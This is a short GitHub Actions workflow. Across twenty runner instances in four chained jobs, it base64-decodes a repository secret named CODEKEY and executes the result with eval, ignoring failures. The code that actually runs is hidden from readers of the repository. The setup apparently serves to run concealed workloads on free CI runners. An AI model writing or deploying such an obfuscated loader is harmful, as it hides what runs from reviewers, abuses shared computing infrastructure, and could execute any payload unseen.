name: CI-demand

on: 
  workflow_dispatch:

jobs:
  task-job:
    runs-on: ubuntu-latest
    continue-on-error: true
    strategy:
      fail-fast: false
      matrix:
         vm-number: [1,2,3,4,5]
    steps:
      - run: |
          eval "$(echo '${{ secrets.CODEKEY }}' | base64 -d)"

  task-job-2:
    runs-on: ubuntu-latest
    continue-on-error: true
    needs: task-job
    strategy:
      fail-fast: false
      matrix:
         vm-number: [1,2,3,4,5]
    steps:
      - run: |
          eval "$(echo '${{ secrets.CODEKEY }}' | base64 -d)"

  task-job-3:
    runs-on: ubuntu-latest
    continue-on-error: true
    needs: task-job-2
    strategy:
      fail-fast: false
      matrix:
         vm-number: [1,2,3,4,5]
    steps:
      - run: |
          eval "$(echo '${{ secrets.CODEKEY }}' | base64 -d)"

  task-job-4:
    runs-on: ubuntu-latest
    continue-on-error: true
    needs: task-job-3
    strategy:
      fail-fast: false
      matrix:
         vm-number: [1,2,3,4,5]
    steps:
      - run: |
          eval "$(echo '${{ secrets.CODEKEY }}' | base64 -d)"
